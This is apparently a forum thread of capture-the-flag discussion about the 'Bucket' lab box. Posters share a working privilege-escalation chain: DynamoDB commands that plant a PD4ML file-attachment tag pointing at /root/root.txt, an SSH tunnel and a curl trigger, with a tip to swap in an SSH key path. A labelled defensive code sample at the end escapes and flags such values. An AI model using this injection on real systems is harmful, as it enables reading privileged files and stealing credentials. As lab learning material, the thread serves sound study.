TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#49
Can anyone give a nudge to get user?
#50
I am a little confused here. I see the index.php and it does have the reference to:
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");

We cannot edit this file because it is owned by root. I have tried using burp to post what is above and modifying this to copy the /etc/passwd file as I know I would have access to it, but couldn't access anything.

So I am a little lost here.....
#51
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with:

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

I can't find this stuff though. How does it show the alerts stuff?
#52
Can someone help me with the root part? I can't get the POST request to work on port 8000. Or is there another way?
#53
for the last part—if the table and item are not there, create them!
#54
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


```
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
```

Where am I going wrong? :/
#55
(October 19, 2020 at 10:07 PM)Kali76 Wrote:
Where do I put this script?

```
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
```

I'm putting that in the local dynamo shell to create the alerts table with item titled Ransomware. I'm trying to trigger the conditional in /var/www/bucket-app/index.php which generates result.pdf by posting to /?actions=get_alerts
#56
Go to http://s3.bucket.htb/shell/ and put the js there. It creates the alerts table.
#57
Instead of futzing about with the js here are the aws cli commands I run:


```
# create the table with title field
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
    --provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
    --endpoint-url=http://s3.bucket.htb

# insert an item with Ransomware as title with path of flag
aws dynamodb put-item \
    --table-name alerts \
    --item \
        '{"title": {"S": "Ransomware"}, "data": {"S": "/root/root.txt"}}' \
    --endpoint-url=http://s3.bucket.htb
```


I then curl after setting up a tunnel:
```
ssh -L 8000:127.0.0.1:8000 [email protected]
curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts -vvvv
```

But I don't see any pdf generated in /var/www/bucket-app/files 

:(
#58
It shows up for a few seconds then disappears. If you get a 200 back with a bit of a delay it means it worked. But you will just get a pdf back with the string '/root/root.txt' inside. It doesn't actually read root.txt.
#59
(October 20, 2020 at 03:01 AM)jmax Wrote: It shows up for a few seconds then disappears. If you get a 200 back with a bit of a delay it means it worked. But you will just get a pdf back with the string '/root/root.txt' inside. It doesn't actually read root.txt.

Yeah, the data field for the ransomware titled item of the alert table isn't correct. I saw file:///root/root.txt before but it still was unable to put contents of the file in the pdf. The html has the actual string as I. The path and the pdf doesn't have a proper attachment. Hmmmmm.
#60
finally rooted.
tunnel:
```
ssh -L 8000:127.0.0.1:8000 [email protected]
```

create table:
```
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
    --provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
    --endpoint-url=http://s3.bucket.htb
```

create item:
```
aws dynamodb put-item \
    --table-name alerts \
    --item \
        '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb
```

trigger pd4ml generation:
```
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf
```

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string
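
Added example, not part of any post in this thread and not the application's own code: the thread shows that the `data` value stored in the `alerts` table reaches the PD4ML converter as markup. Assuming the application writes each item's `data` into the HTML it hands to Pd4Cmd, the sketch below escapes stored values before the HTML is built and flags items that carry `pd4ml:` tags or `file://` URIs. The function names (`escapeHtml`, `inspectValue`, `renderAlerts`) and the sample items are hypothetical and constructed for illustration.

```javascript
'use strict';

// Escape HTML-significant characters so stored text is rendered as text and
// never parsed as markup (which includes pd4ml: extension tags).
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Patterns that should not appear in alert text destined for a PDF converter.
const SUSPICIOUS = [
  { name: 'pd4ml-tag', re: /<\s*\/?\s*pd4ml:/i },
  { name: 'file-uri', re: /\bfile:\/\//i },
];

// Return the names of the patterns a stored value matches.
function inspectValue(value) {
  return SUSPICIOUS.filter((p) => p.re.test(value)).map((p) => p.name);
}

// Build the HTML fragment for items in DynamoDB attribute-value form
// ({"title": {"S": ...}, "data": {"S": ...}}). Every value is escaped, and
// items that match a suspicious pattern are reported for review.
function renderAlerts(items) {
  const findings = [];
  const rows = items.map((item) => {
    const title = (item.title && item.title.S) || '';
    const data = (item.data && item.data.S) || '';
    const hits = inspectValue(data);
    if (hits.length > 0) findings.push({ title, hits });
    return `<tr><td>${escapeHtml(title)}</td><td>${escapeHtml(data)}</td></tr>`;
  });
  return { html: `<table>${rows.join('')}</table>`, findings };
}

// Constructed sample items (hypothetical): one benign, one shaped like the
// item discussed in the thread.
const SAMPLE_ITEMS = [
  { title: { S: 'Phishing' }, data: { S: 'Host fs01 reported a suspicious mail' } },
  {
    title: { S: 'Ransomware' },
    data: { S: '<pd4ml:attachment description="attached.txt" icon="PushPin">file:///root/root.txt</pd4ml:attachment>' },
  },
];

const result = renderAlerts(SAMPLE_ITEMS);
console.log(result.html);
console.log(JSON.stringify(result.findings));
```

Escaping closes the markup injection; running the converter as an unprivileged user limits what any remaining file reference could read.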
